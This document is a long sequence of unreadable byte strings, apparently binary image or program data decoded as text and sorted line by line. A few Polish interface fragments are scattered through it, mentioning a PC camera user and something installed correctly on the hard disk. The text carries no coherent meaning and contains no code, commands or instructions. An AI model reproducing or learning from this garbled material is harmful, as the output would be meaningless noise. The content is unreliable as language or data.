XE~[MzUGcI;eOC^D6]C5lRF`M@fKAoSHuXJx[M~aR
XE{P;yR<wN?yNE|XH
~xe\X'#
xeylzog
xfeo]\p^]iVSdQNl[Xtb[vf_ugal_Wh]OcZLxsj
Xf|O`uYg}\k~Q`sVdzJXj'7C5IN>TYF\aQejScjYhq[gsX`mclujjp{qq
XfxJTfF
XfyP`qQaqM]nFUhJ[nJ[pZh~g|
<>x./g;Al
xgjZIL_KJjOKlOKmPLjPPlTVpXZqY[t\^v[^uZ^v\bv_d{`d~cg|cgydfzdf
Xg&]l,_o0ak-[f"P['Tb7ct8cr=hw@l}:fw8fwJx
 X=GvU^
XgzLZpJVnO\vQ^xLYsQ^xQ]yUa}Sb|Ra{KZtTd{
XgzLZpKWoO\vQ^xLYsQ^xR^zUa}Sb|Ra{KZtTd{
Xh[Swg`
Xht?O\[kxp
Xht?O\[kxq
 X;HtU^
x`hwafhGKa78V-*[8<U:CC0?3&61#5(
x`hybgiHLa78V-*[9:U:CC0?3&61#5'
xhyi]qeSh
 X -ibcB"
<)<.<X<i<o
XirANVIXaUdmO^gXirXlwPcpXhuQ]iCQ]SamHW`GQ[S]d1:>
XirANVJYbVenO^gXirWkvPcpXhuQ]iCQ]SamIWcGQ[T]f1:>
Xir>KS?O[M^gCV^SitWo{LbnUerIWc=NWOal?PYAMSOZ^BKNGOOcgh
Xir?LT@P\M^gCV^TjuVnzMcoUerIWc=NWOal?PY@LROZ^BKNGOOdhi
x}jb|nh|mjzkiyjh
@XjI_qG_uD\tJbzNc~Sh
@XjI_qG_wD\tJa{Nc~Sh
XJwK:pB0vE5
XKC^NGo^U
|~xkmwijsefyghuefpbcvig|pnzqm|tmztmztm
XK}Q@}F7}B2y=-r.!
XK}Q@zF6}B2y=-r.!
XK~RA{G7}B2y=-r.!
XL~aSkXKhVKnYQiVO
xlftd^qYY
|~xllwijsfdygftecpcauhf{omypl|tmzulztm
xmlpbS
xmordeoabob`yhe
xmykeuicsg]
x_]N1-pLF
X@}N9pK7
xn}b{mW
xnnrdepbcob`ygf
{+xN{?ODBE
xnth`ge]gnfpzsz
x^<$oA)
xoynjvjjyjhrca
xoy\NqRC
>XpAYqLd|CZt4MgAXrDYtBWsBZxH]|Mb
xppjerjcphalfanb`d_\
xppjerjcqibke`ocaha^kcdwkk
xppjerjcqiblfanb`e`]
xpp~vv~zy{wvzqnzokwqlzto{upupmvrqmkj}}}
XPTPSW
xpvqujm~su
XPVSSG
@Xp@XpLc}CZt6MgBWrFXuBWsBZxG\{Mb
xpzndoaUiYRnbVnbXfZTf[W?55#
xQ\E=wa[
xq~ggyYaxQ_vN]wP_yZi
xq~ggyYaxR_yO\vP_yZi
xq~hhzZbyS`zQ`zO]yN]wP`wS`vP^qal
XQHSMFXOL_SOdTMnXMz`P
xQ]JB~kd
X`qOUoLPyTX
XQxZUoWQ
XQxZUpXR
XQxZUsYSjWObMEVD=gMGkQJvRL
X.'R0*K.)M0+L2,L2+H.'G+$E)"F*#G+$H-#G+$E)"B%
=Xr2J`>UeCWbDV]Qbe
xRaTLpc[
xRbRKwf]
xRbSJzi`
xRcVN}kd
{xr_\dQNiVSeUOaNI`NGkYRjXQdRK\ID_JHaPMeVSVJFaUQ
xReUNud[
X]rFQg:G]9F\=H\;I\:H[6DV:FX<FX]fzGTj8F]4CVV[p
XRichS
xR`J?tXM
xRlaYyld
|x{rn|so
|x{rn|so}wr
xRQ<4aK@
xRQ<4aK@uZL
xR`SKyja
xRVB7iQE
xRVF?iXO
X^]RWXkpn
\xrXyuXxwa
xRYC8qSH
XRyJF[71C"
xRZE=pVJ
xRZI@q[P
xRZI@r^S
xRZJCr_W
+?x'?s
([?(X>&S8#N3
x|sfth\i]Qi`S|tg
[x}Sjr9PX7PZF`lg
xslc2.)
xslc3/*
XSrMTeCOY1E^)?o3Av55S$
XSTJFA}wr
X^	Sw5_
+?x(@t
X.'T0*L/*M0+K1+K1*J.'G+$E)"F*#H,%H,%E+$E)"B%
xt;41!
X*#T4)Q)
}xT ~C
xT\C9oQF
xTdWOwh_
xTgUNqXN
xT`LAv\P
xtpkjplk
#xt#pm mi#qp*
xt|sovmisjfqhdlc_pgcofcnebd[XbXQ`UQcWU[OMZNLfZVugare]qd\xf_yg\}cUxVFyRC}[N
X,%T('V)2e8HpCVmCUi?Qc?Me>Mi@OmDSrJVxOWqEKvFD
XTwD=REEK@HA2E0):/+951=71>.(8 +:
xtypmtmjplksss
X`~T\yY`{W^yVZvVZwV[zAOy
X`~T\yY`yW^yVZvVZwV[zAOy
xu~camRLWWMY|kx
XufIbd:Q`1LV-HV-IZ3Tc6Yg8Wf7P`0GW*=J):C*<C(;C(=E)>F'=H&?I(@L$>J$@K%:B%15%11%32#10&24'35*53+8:-9;/5:25:47<58=8;@7:>3;:1?;/B?)><+>C/?F);B&9@)68)57)55)57,8:-9;+79+77*66)57+79,58,58+474>>1;;4?=5=<;@?=BA?EDEKJFJKAFE=BA?GFCPNKXVR_]W\]WSRdWU
XufIbd;Ra1LV.IW-IZ3Ub6Yg8Wf8Qa0GW*=J):C);B'<D'<D'>F'=H&?I(@L$>J%?K%:B%15$00$21$21&24'35*53+8:-9;/6925:66<77=::@99?3;:0>:0A>)><+>C,>E(:A'9@)68)57)55(46,8:-9;+79,88*66)57+79,58,58+474>>1;;4?=5==;@?<A@?EDEJKFKL@ED>CB?GFCQMKYUS`^W]\WSRcWS
xUH}RC
xu~mlumoyvx
xuwkinb^hYVn_\tgevjjsgguiirjjjed_ZW
xuwkinb^hYVn_\tgevjjthhuiirjjjed_ZW
xu|xsywoyys|}y
xvdSPjWTo\Yn[XfSPiWPlZSjXQiYRo_Xn]T\OG
?&Xv]Vr[NoZJo[FmXHkWLhUH_PI`QF[LF[LCXIATE?RCDZHF\J=ZK?\L=ZJ7TE0B5(+"UFD
Xvw^;1p@4
XV\XV\(
XVzXSnW[n^ev{
XVzXSnW[n_fw{
X][V[Zz}{
x~wOQzGD
|xwsuuqwrZ_^VXX
]xW;t[
xwuLEwE
xw{VPUldkpil
{x||||wvvrqtoqtnsvsu
=x!>w$?w-E{8M
@XWwif
xw{WPWldkpil
XwxeH:uN?
X][W\[z}{
[Xx_^~cb
xxGy~Ov
^`xX\oMNb>;T.3Z /g"0k
XX; tg
XXvZ\{`a
xxwijpcaj[Xn_\k\Yl`\wlh}qozqmwnjme^|vq
xxwjhpd`k\Yp`Zk\Yl`\wlh}qozqmwnjmd`|vq
}x|xwvts_aaOQQ
%%%XXX{{{cccSSS<<<+++
=x"?x$?x-D|8M
}|x{yLSPq|y
x~yo|hhx]czZc~Ua}O]yJ[vHYtLZwQ_{Yc{\bunkz~u
xyxntzkoylj
<Xz4Qp4Sl-Le0Ng0Ng2Mh:Wr;Xs9Vq:Up9Qo:Xs@\zH`~Hd
<Xz4Qp4Sl-Le0Of0Ng2Mg:Wr;Xs9Vq:Up9Qo:Xs@\zH`~Hd
][x\\za`
X[zBIp:FpBLtHPuPWxQXyR\zW`
X /zDR
xzo[ZhHCwF>
XZqOUlMVmOZiJYnLWxV`sQX]:>Q--T00U2/_:6_<8O*&M($O*&T/'V/&P'
XZrPVlMVmOZjKZlLWvW`rQX\9=P,,T00U2/_:6_<8O*&N)%O*&U/*V/'O&
XZ|RSyWZ
XZ|RTwWZ
X+ Z- X(
/;%y;~;
+(y		~
Y0']4+Y2)T-$T+"V0$[5)kB9nD?mB?nA>m=<p>>tA>vD>wGAyIC
Y0!cD5\K>>3+#
%@y0K~>T
Y0!T7(K8+8/&& 
Y0!T7(K8+9.&%
Y 0zCR
Y/"\?1SE981(
Y 2yCS
Y/#_2'[.#Z0$\2&X.!]1$l?2
Y3.1 (16 
Y>4[=2hE8}QD
~Y58M*.A $7$"8!
Y6"jP@zeV^PD) 
=,Y8%bB/
;.Y/#`8,tG<
@,yA0e:+a6'k7'
@,yA0e:+b7(k7'
~Y*.A $7$"8!
Y.%^A8H81"
YaaGONW]\
ya	{`	}c	~d
yA<KHDSNKVTJYQQ\YU[WR^VO]WP`TN^TM^TMcQF^PD]MAYI=_OCcOD_K@ZI@[HCYLDXOFWMFXNG]OI\LFWFCQB?PGCQKFJEDOGHICDNIHKFEKFEPLKRPOPPPPRRRRRPRRUXVVYWUXVWZXVYWUVTXST\VWXQTVPQ\WX^YZ^VV\TTaYY^VW`UX^SUaTVeWXdTUgYZi]]g]]aUU`TPcQPcNP`LKcQPcTRiWXjUWdPOhURhWTlXShUNgTLjTNjZSjZSlYQoZRubZtd]xf_|ib{h`wbZr\Qs[Os[OzdY|cYx\QsVG
Ya~QRn>CX7AS8BS8BS9FV7FV5EQ3?E3;;3;:0<<1@</@=/B?-?>/A@.BC-BD+AG'9D%7>(8>'68'46&22&24&24+47+47*44*44(14'11)33*44&24(14)25)25&24&24*36+47(14%.1%.1)03(00*22+32*21%04.7:.9=5NRRw{
YAS7!9=*CF7RPA]WEbXDafRo_LmZJlfX|l`
Y^a===USR
YAvM6nC.a>*[=,qWG
YAvN5nD-`=)[=*rXH
YboFPZT[dKX`N]fYp
YbpN]mN^oM[nZfxScsP`mT]fTX]TYZPUVOPTHNU<DK9>G8>I5>G4>E2>D.:@/=C/=C1=C2>D2>D6BF1=A0=?/<>2?A0<@0<@.:>1=A3?A/;=/8;-6909</8;/99/99.8829<2;>2<<4;>3:=2<<2=;4?=6>=3>B8NSSr{
Yb}QRn>CX7AS8BS8BS8EU7FV5EQ3?E3;;2:90<<1@</@=/B?.@?/A@.BC-BD+AG':B&8?(8>'68&35&22&24&24+47+47*44(44&24%11)33*44&24(14)25)25'35'35+47,58(14%.1%.1)03(/2)11)33(31$/3.7:.9=8NSRw{
yc|D1J[I`{j
ycGw`F
Y_{ckwfowco{hq
Y^}CMkHSqP[yhr
y`*CS)EV+GX1K[8U^7TX9T^4N\1KW0IY2L\2Ma2L\1K[3N\/IY,FV&AO(>J'9D)<D*=E)<D'<D';F'=H(AK%?K%?K$9A%47%32'54(65'33'33(46)57*66'54(65*66+7909<39>37<77=89=3781;;2BA2EB.AD,?D0@G0@F0?B1>@;HJ;GI.:<+79)55/994>>7?>9?>>DCAGFAGFCIHAFEAB@@A?DECDHCCHFAHE@GD=DA9B?;A@>?=RIExb\
y`*CS)EV+GX2K[8U^8UY9T^4N\1KW0IY2L\2Ma2L\1LZ3M]/IY-GW&AO(>J(:E*;D)<D)<D(=E';F&<G(AK%?K%?K$9A&58%32&43(65'54&43(46)57*68'54(65*66+770::6:?58=88>89=2671;;2BA1DA.AD,?D0@G0@F0?B1>@:GI;FJ-:<*79)55/996>=7?>9?>>DCAGFAFGCHIAFE?B@AAADECDHCCIDBIDAHE=DA9A@;A@?@<RJCxb\
YCtxl3
YcuX_nGIQg`e~ur
YcuY`oGIQf_d~ur
y~|dmjKYX
YdZN;.RA8VB7ZC;Z;2iD6lL9tUFxYJ~]N
YE:^D8kN@yXE
YeeS^bdmpnywr}{t
Yeg?KQEQWDPVCMTCKREMTFNU=GN9CJ-8<-4=HJT
Ye}L\sXl
Ye}L[uZk
ye]V'#
YFwkSp
YFzO:xQ;vM>yNE}YI
ygho]\r^]iVScPMl\Vtb[vg^uh`l_Wh]OcZLwri
Y=,g=*{I3
y~|glkjkglpklomlominmeji
y~|glkjkglpklpklomknlgii
.y!GN&
YgsVeuQ_rO_oL\mJZkO_pVfwXhyO_pO_pWgwTdqir
YgsVeuQ_rO_oM]nIYjO_pVfwXhyO_pO_pXgwTdqir
YG~S>yQ?
YG~S>zR@
YG<VB7dJ>
Yg}Wfy`o
YgyJTfE~eC|c<v^;s\=r^;m[7iW8eU4bU3dV3dV1cW0aS-^P+\N$WI
YgyJTfF
YgyN\nRatSbu\j}j{
.) >,%YH?{bR
>?yHI{SU~SUtRVrRWpPWrV[tV]xW[wR]sARm'>k!5o-5d%"1!
Yh'^m+^n0ak-[f"P['Tb7ct8cr=hw@l}:fw8fwLx
YH{N9{N9
yhvcVf_SgXN_ODTM>LMAMF?LEBQ>>L;<J>>L=;G?=I;;G:<G7=P7:O86L76F87G:8K::J??K69H13E00B66DDBNA>MABPCFU>CR?DS;BS8<N>@RA?RB<O?6J;:JA@PD@SECW@AU9<Q>CX@EZFG\IG]HF\TQgdazWYqPNkTRoWSpXTqb]xke~gazgazwr
YhxN\nSctSbu\j}j{
YIBXI@ZI@ZG?\H=\H=\H=]I>_I=XC;XB7[B8aG;lRBvZI
yIE}MI
>?yIJ|RT}QSuQUqQVoPWrV[tX\xW[wR]sARm&=j 4n-5d%"1!
y}jb|nh|mjzkhyjg
yj{h[taT{k[
YJ}YIzXHyVHvOAqG:uI<yM@
yke}gb
yl<~F	}I
YLuQAgL>hH;lOA
YLuQAgL>iI<mPB
y|lZYjGDvG?
y{lZYkHDuF>
YMCN83P4-N2'P3%Z:-`=/qE8zK6
ymgvaY
y|m[\hKGvHA
ymm7&#<
ymm7&#;
ymm7&#7&#;
ymmsggk_]seftfgvigzmk
ymmsggl^_seftfgwjhzmk~so
y~|msnktjktgz
ymszeh~bb
YMwZQp]UfSKbHAmTJtZSzXK
{ynfweZ}i^|ib
YNl<0f6*d2,b1)k;7f9<f:GsGXvJ[tGXsFWuIVzOX
ynpzlm~qo|mj
YNyXHpcI[
yoaYR'#
Yo{G_k:Uc&AO;[hAdn-Q[;am7^l,Vc"M\#O`&Rc%R`#P]&S^(NZ
Yo{G_k:Uc&AO;[hAdn-Q[;am7^l,Vc"M\#P^&Rc%R`#P]%R](M[!@O =K)FT#CP!DR IX O]&We'Xf%Yf'[g'[g)Zh$Xd&Xdk
yo|hhxZbyXc~Sa}M^yJ[vHYtM[xP^zWc{\bunkz~u
Y`oN^kM]nM[nYdxRbrP`mS\eUY^TZYPVUOQRHNU<DK9>G8>I5>G4>E2>D.:@/=C/=C1=C3?E2>D6BH2>B0=?/<>1>@0<@0<@.:>0<@2?A/;=17</6929</99/99/99.7:29<2;>2;>4;>3:=4<<4<;4?=4?=3?A9OTTs|
yoozlm
yo{rh{ph{riuli{mq{pl~so
yo|sizog|sjuli|nr{om~so
yo`XQ'#
YPFL-$S4+`?6`C<Y93`B7hH;oUNy_S
Yphd}sc{sZrh_ri
Yphe~td|tZrh`sj
yp{ph{tkzulynjzppzlm}un
YPx\Qm[TmTJbI?oTJtZTzXK
ypynjuiixigrca
_Yp^Zs`Zsd[u_\uWXmVWl]^r^buY_rY_ragzXau\i
_Yp^Zs`Zsd[u`]vWXmVWl]^r`au[_rZ`sagzXau^i}VcyYi
yqE4+bSJ
yQ\IA~j_
Yqw,FLHae
Yqw.FLJ`e
yQY<3rND
|/Yr3Y
yR\B6k]Q
yR[C7oSB
|yr_\dQNiVSeTQaOH`NGkYRjXQdQL\ID`KIaPMeVSVJFaTR
yriscX
yR[JAp\Q
YRkLCfH=eH?~`[
yroggsekqfivgd
yr{rnvmisjfqhdlc_pgcofbnebe\Y_WP`UQcWU[OM[OMfZVugare]re]xf_zh]}cUxVFxQB}[N
yruk`cI
yruk`cK
yruk`cM
yRX>2pJ>
Y_^RXWkpn
yRZNDuf]
>Ys2J`>UeCWbDV]Pad
;'Y:+S70Q8.S7,V:/aA4mH:wPA
ySaTLwh_
yS]B8sSF
ySbQHsaV
ySbUMvj`
yScVNvg^
yScXP{nf
yS`D=rME
ySdYQsf^
ySdZS~sk
yS[E9rXH
yS\F:oSH
yS\F;qSH
yS^F:sVG
YS|GDqB@n>;l97e64b30a2/`.+Y1)X,#U<8l<9q=7n71f30a/,Y/,Y/,Z0*[/+\0-^30b74f;:l=>q>?r>At@AyACyBC{GE
yS[H@r\P
yS[I>u_S
yS[JAq]R
yS\J?r\P
yS]K@t^R
yS]LCtaT
yS\LEubZ
[Y}SL{MFkDBiIJG051
yS\MDq^V
yS\MDtaY
ySN8-]E9
ySN8-]E9wZK
yS`NCt^R
yS^NGwf]
Y_sOUqLPySY
yspkfc^\\V`a]digmuuu
yS^QIsd[
_YsTK~`U
_YsTK~_V
ystxvvwyydjiU`^
ySXB7nSE
ysxqprfhhheaqdb
ysxrqsfhhheaqdb
YSzKG[71A"
yt~aXpVJmuVZ
ytkownika...
ytkownika kamery PC
ytkownika na twardy dysk (
ytpkfc^\\V`a]dignvvu
y{tqxpq~qsrde
ytsywvwyydkhS`^
"YTVsqw2/8&!"lWO
{yt[Y~f`U?:WA<_GA`F?X<5W:5cFBeNLaHFgGByUM
{yt[Y~f`W?9V@;_GAaE>X<5W;4aGAeNLaHFgGByUM
ytzutyrw
ytzutyrw~qs
yU^LAu]Q
yushduieufcudaqc]p`Zo_Yod\tg_xjdvjfla]
yu|sonjejgb
yuthduieufcudaqc]o_Ym_Yod\tg_xjdvjfla]
yuysnoidjgb
y}~UZYUXV
*y/.uzyzuEFz8GD
Y_v"&8
y%*+vp*vCpuC%
YVvD=REDM@HA2E0):/*860<60=-(8 +:
y~}V[ZSXV
/YW'RB
}y|{wytsrpoafeNPP
}yx}~||
:Yx1Ni3Rk>\w<]w4Uo6Wq6Vs5Ur7Wt>^{Ba
:Yx1Ni3Rk>\w>\w4Uo6Wq7Xr5Ur6Vs?_|Bb
?y`@xa?w`7oZ0gT+aP']L%\K
(Y[#X['^e1lu,ht.gv2hy4hy3gx1dx0du1br4eu:j|2`q,Yg3`n3^m5_lAjsDktEltKpxJowAem>bjIhqh
(Y[#X['^e1lu-iu.gv2hy3gx3gx1dx0du1br4eu9i{2`q-Zh3`n3^m5_lAjsBktDksKpxKowAem?ckIhqg
yxkYXlYVdOMbMKbMKjXQo\Uo]Vj[RgWPhXQgYSrif
yxkYXmZWdOMbMKaNKjXQo\Uo]Vj[RgWPhXQgZRrif
yx_NK[JGiYSgWQ[JGUB?WD?[IBcQJfSNaNIYIB\PJQFBwkih^^/(+>7<wpuYRW+$+C<C
|yxuqnji]XYqoo
|y|xwvts_aaOQQ
yxxl{yn
yxxlzxm
?&Yx]Xv]TqZNoZIp[FlZJjYLgWH_PIaOE\MCXIATE?RAE[IG]K=ZK?\L<YI7TE.B5(+"SFD
?&Yx]Xv]Vr[NoZJo[FmXHkWLhUH_PI`QF[LCXIATE?RCDZHF\J=ZK?\L=ZJ7TE0B5(+"UFD
?&Yx]Yv]Vr[NoZJo[FmXHkWLhUH_PI`QF[LCXIATE?RCDZHF\J=ZK?\L=ZJ7TE0B5(+"UFD
~yx~zysvtNURnyv
YXzY[zY]zUYuTXpW]pRWpKToO[wUb|Wc{[e}We|\k
_^][YY
Y_YFRD8TH<WJBXL@aNFlXMwdW
Y`yJUk:G]BPgDJaIQhgn
Y`yJUk:G]BPgDJaKQhin
YYk7<E+48+55*37,8<-9=*79)76'54)55)55)57)57-:<.:<)57*68)68,9;/;=-69+47*36,58.7:+47*36)57)57*68)57,58,58(46(46(46+47*68*68*68.7:/8;.7:/69*21(31,661@C@]dl
YYk8=F+48+55*37.9=-8<+79)76(65*66)55)55)57-:<-9;)57*68)68,9;.:<-69+47*36,58.7:+47*36)57)57*68)57,58,58)57)57(46+47+47,58,58.7:/8;07:07:*22(31,660?B@^cl
YYk<>PRTlLOk.6S0;YEPl`d
YYk=?QRSmKNj06S0<XGOlac
yyQLIIG?IKEHMLEJKCIH@FA@CA=E;:B8<@:;?96:4/6/-5+08.*/-/11,..*/.%+&**$* 
Y`yRTsOOqMMtRR|Z[tRXlPVgLUnTaqWdsXbxZe
Y`yRTsOOqMMtRR|Z[uSYlPVhMVmUaqWdsXbx[d
|@@y><}@>y><x=;y><z?=|?=}B@}B@}B@
y><}@>y><x=;y><z?=|?=}B@}B@}B@}B@
:Yz4Sl3Qj1Oh3Um1Rl4Uo:Xs<Zu<Zw?]z>^{A]{D`~Jf
:Yz4Sl3Qj1Oh4Sl1Rl4Uo:Xs<Zu<Zw?]z>^{A]{D`~Jf
][y\\zba
~}y|zLSPq|y
y|zSZWgro
y|zT[Xgro
yzxuxvx
:&}=${;"z<$
}?!z> 
=#'Z)._"
?#'Z)._"
+ @'+^(/Z#
/Z0Al<Ou8Kp*=b
*Z"/[1Al=Pv8Kp*=b 2[!2]"7]+Cg(>b'=a.Fj*Bf,Eg,Cc-Ba2Fe/Cb0B_2C^7F`BPfBPcIUgGTdT`r[ewco
Z1"i2#
Z<1N=4,$
Z/&\1([-%Z0$\2&X.!]1$l?2
,Z'2^(4\)4Z&2V!-Q".V /]$4b&6a!1\!2] 3Y"6Y)=`)<a,?e'=a(>b-@e+?b-@c.Ab-?^DTqXf
*Z$2c0At9G{4Bw2@u2@t(9j(9j-<m"0d.<m.<l3@l-;e%1[".^!.b$2f(8f
*Z$2c0@u9G{4Bw2@u1?s(9j(9j,;l"0d.<m-;k3@n/;e$0Z#/_ -a$2f(8f
Z2 eH9eREI@7"
Z 2zBS
>+|<#z3
>+{;"z3
?,|<#z3
Z3*b?1
Z/&`3&{B3
Z3{L-F, LCFj_iwiu
Z3+V1)N(#M( U.&V/'X1)\5-^5,V+"R'
Z3+X1)P)!O( U.&V/&Y2)\5,^5,T+"Q(
Z,%`4-\0)R) _6-d:3\1(V+"_2'R%
-?z"4i
,@z"4i
Z4(i@7{QD
Z4/l>7
Z?5`>1nD7~M=
Z5-Q2/Q32Y:;N0/Q2/U50M*&G#
Z5-R30R43Y:;N0/P1.U50M*&H$
z5@y+7m"-a
Z7*c=1wJ?
(Z)7k)8i,;l*8i
z+7m"-a
?]z7Un8Vo<[t@^y<]w>_y=]zCc
/z%8|-?~H\
z:9|<;~>:~>:~=<~>:
Z90dB<|PI
Z9&^?0Z1"S-!M.%O2)S6-R6/T72W71^.(_/)]9/_L?V_JDxZ7
Z9&^?0Z1"S-!M.%O2)S6-R6/T72W71X4,Y4,_8/cA4cB3[4&_;1V<5
Z9&^?0Z1"S-!M.%O2)S6-R6/T72W71X4,Y4,_8/dB5cB3[4&_</W>4TA:O<7M:5N<5R@5Z?1Z8+_9-`@5Z<1X:/^H<RH>OE>NC?NB<SGAYH?`I:^=-]<-];.^2+X0+T4.P:4Q>9O:8N>8TC:ZD8[B2a@-^C5aE:Y<-S6'Q4+T9/R?0U@1UB5\B6Y:7]9?_9E_;KcDSb1?`BGZEHVEPRBSJ@PJFYQG^_Kb_IbbGaeQndWqcH\bHZ`EU\FR\GOiOUr]e
Z9%^?0Z1"T."M.%O2)S6/S61U72V61W3-Y4,_80c@6cA4[4&^:0V<5
*Z 9k)Cy/H
Z9%lRBydUWI=-$
Z9&lRBydUXJ>-#
?]z9Tn8Vo<[t@^y>\w@^y?]zCc
Z9?y[`
/ zA2S?4WE:XH;_JBfPEoODwVF
Z/&^A8I92"
@zaA{c;s^7oZ1eS.]M8cV2]P$=3
	zaAu`@
ZadGOOW]\
zae{ih
zae{jg
 zainstalowany poprawnie na twardym dysku.
zanie programowe dla u
ZazWbxU_wS\wNVsR\zhp
^Z}BAi36b04d.3d07i48k37l29k.5f*0_.2b04d16g27h07h16g27h26g15f/3c-1b/3d/2e15h8<q=CxDI
^Z}BAi56b15e.3d07i48k18j29j.6e,0`/3c04d27h27h27h16g39h37g15e.2b-1b/3d/3d04g8<q>DyCH
`[zb\}je{ke
ZboMWzXbnNYkMZ|[i~^inLVU48R01L**a??hEBT52L+(P-*Q.+V2,R+#H
Z]bQR\TW_V]fX]f[^c`^d]]cSW\TX]V]`Yee\clHMV7@I/;A/:B/;A0;?0=?.:@,8<-9=+8:-:<.:>3?C/;?,9;-:</;?-9=+8:+8:+791=?0<>-9;/8;07:18;18;-69-69/6908829<1:=0::1<:2:92:9/:82::3<?6=@<MPOpy
Z]bRS]TW_V\gW\eZ\d`^d]]cSW\TX]V]`Xdd\clHMV7@I/;A/:B/;A0;?1>@.:@,8<,8<,9;-:<.;=3@B/<>+8:,9;.:>-9=+8:+8:+791=?0<>/8;/8;07:18;18;/69-69/6908829<1:=0::3;:2:93;:1982:95==6=@<MPOpy
ZBT8":=*CG8SN@\ZFcXDafRo_LmZJlfX|la
>zb@yd4oZ0hU.eV)^P*_Q3YM)C6
?z$@}+C}1I}7L
_ZcKIUaao|}
_ZcLJVbbp|}
?$}?'`zcZzb[w`c{cav]_oX`n\XkVScRPbUI]PF_QE\NGYLHYLNWJO\LOYIPPBMP@GO8B@(=,
?$}?'`zcZzb\xac{c`v]`pYao]ZkVTdSRcVI]PF_QE\NEYLHYLLVIO\LOYIPPBNQAGO8A?'=,
ZD9^B7lJ=|UF
ZD9`D9kK>~ZJ
Zd|ALg3?W(4L
zd}D1J[I`{k}
ZDi]Sl^Xm`Xo_Xtf`}f^
Z_~DKlMUr\cwEJY
ZdkLUYV]``eh/69)18%*3^[{^Yya[~YUx]V{_W|c[
ZdkPY]JPUIUWQX[6Sb2M[4Q_6Q_:U_7U`:Yb>[b:T`6OY4LR5OU:aiMw
ZdkPY]KQVIUWRY\7Tc2M[3P^5P^:T`7U`9Xa>[d:T`6OY4LR5OU9`hLv
ZdvQ[lPYmQZnLWkBPc8FX1AQ'7G$4D .@
Z,!e5)yE8
Ze{ALg4?Z)5M
z{{}}`ecVa_
?*-ZEGsah
z{{}}_fcWb`
ZF;^D8kN@{YI
ZF;dL@x]S
ZF;_E9lM>zYF
ZffS_admpnxxp}{t
zfkq`c
zfkrad
~zhgbPOlYVhURdQL`PJdRKgTOkYRfULcRIbPIm`XTKG
Zh~N`wWk
Zhz\j|ao
Z=.i8(
\=.ZI<8/&!
\=.ZI<90' 
ZI@aXKqg]
*Z :i(Bx/H
}zifbQNlYViVScPK`PJdSJgUNkZQfULcRIbPIm_YULI
zif|mk
zif}nl
Zi|]h|_gxXao_exQXgRVaXTY{ro
Zi|^i}_gxXao_exQXgQU`XTY}qo
ZI{N9{N9
zivdWg_SgXMaPEUM>LMAMF?LFCR>>L;<J>>L=;G?=I;;G:<G7<Q7:O86L76F87G99K::J>@K69H14C//?66DCCQ??KABPCFU?DS?DS:AR8<N@@RA?RB<O?6J;:JA@PD@SECW?@U9<Q>CXAF[DG\IF_HE^UQjdazWYqPNkUSqWTnXTqd]xkd
Zi|We{ap
ZiyK[kJ]jQdqNapL]pdu
ZiyK[kJ]jQdqN`qL]pdu
^;zJ2F+!]JMr`g
ZjaW^OM_NK[OEeSHw`Q
zj{fReeP_\GVO8FkUagOY}fnxafS<@aJOdMRT=BQ:?U?DXBGUAFB153
ZJlDAa<:X=<\<?^<>]?;^D>]I;WI:YE6RC4PTAbVPoZYsa\w^XqTI]N?TPAVSF\T?XJ<TPDZ[Nd[Pd^QgXMa\P\gX`fU^jS[lMPoNRnLRoMM}\Y
ZjqK]dFX_K]dN]fQ`iSamUerVfvSevRbrScs[k{gx
^;zK0G,"]KLr`g
`:zK0J/%cPSzbj
Zk~K^sPcxO`zN_yRc~Qb}Uf
ZK}YIzXHyVHvOArH;uI<yM@
}}zlmwfiradvkmSKK*!
~}zlmwfiradvkmTLL*  PCAk___RP
zLW_KX`RYbRU]HNSHMPELOEVYUw}q
zLxwOvxIvs]
z}m[\hKGvHA~HA
ZMk;/e5)c1+b1)k;7h9<f:GsGXvJ[tGXuEWuIVzOX
zmo7%$?
zmo7%$7%$?
ZmtDZeFZeJ^iDXcZs}Zt
ZmtDZfEXeJ^iDXcYr|Zt
 znale
!=-=Z<Nm;PoEYxJ_{N`}EWt5Gd<NkVh
!=-=Z<Nm;PoFZyJ_{N`}EWt5Gf<NkVh
zns~XZ
zntyfi~bb
ZN|WI~WIxUG~TG
ZN|WI~WIyVH
ZN|WI~WIyVH~TG
z}nYWhHB|I?
Z?~O4pD,i?(_:$Z<+rXH
Z?~O4qE-i@'_:$Z<)sYI
 zosta
_Zo]Zpd^u
zp}hhx[bvXa|Ua}P^zLZvGXsEZvK[xP[vY]pnfp
ZP{MEM,#2
zpp~vv~zy{wvzppyplxrmzto{upvqnvrqmkj{}}
zPXB6oQF
zpy\NpQB
ZQHM:+R:.T;+Y<.b<0fC/uSF
&$$zqm
ZqmD1)=*
zqsphqni
zqsphrni
zqte\k\SXMEYPGRHASIBPE=RI@TKBRG?OD<PC;OB:OB:OD<PE=QD<QF>WMFWQL\SOVLEQE?NC;QKDVRMXOKWMFSJAPG>OD<QF>OF=QH?OD<K@8K>6I<4I<4K>6I<4J=5H;3J=5G:2I92I92H81I<4G:2I<4J=5I92K;4LA9RG?SH@SGATJCSIBUKDULCSIBPG>RI@QF>UJBQH?PF?QE?QE?OF=PC;QA:PC;UKDTLETLEUKDVLETJCSGAJ=5H90E9/F:0G8/F7.C7-D8,E9-NB<UKDUKDOD<QF>OF=QH?OD<K@8K>6I<4I<4K>6I<4J=5H;3J=5G:2I92I92H81I<4G:2I<4J=5I92K;4LA9RG?SH@SGATJCSIBUKDULCSIBPG>RI@QF>UJBQH?PF?QE?QE?OF=PC;QA:PC;UKDTLETLEUKDVLETJCSGAJ=5H90E9/F:0G8/F7.C7-D8,E9-NB<UKDUKDVLEUKDUKDSIBRHASH@PE=RG?QF>OC=M@8MB:PE=UKDUOJ[UPZRKWMFWMFYQJXTOYSNUKDQH?PC;K@8L?7K>6L?7L@6MC9NC;QF>SH@UKDVLEXNGWOHUKDULCQH?PE=RG?OD<RG?NC;QF>MB:QF>OF=NE<RG?OF=OF=PG>PE=NC;PE=OD<MB:MB:NA9M@8M@8K@8J?7K?5L@6L=4J=5NA9J?7MB:OF=LC:NE<PE=RG?OD<PE=MB:NA9M@8M@8K@8J?7K?5L@6L=4J=5NA9J?7MB:OF=LC:NE<PE=RG?OD<PE=OD<RF@VLESKDTJCTJCVMDRI@SH@RF@OC=PE=NE<NE<OD<NC;NC;NA9NA9M@8OB:RE=TIAVLEXRM\SOZQMVLEPE=TIAXPIXPIVMDRG?OD<NC;PE=SH@WLDdXRuic
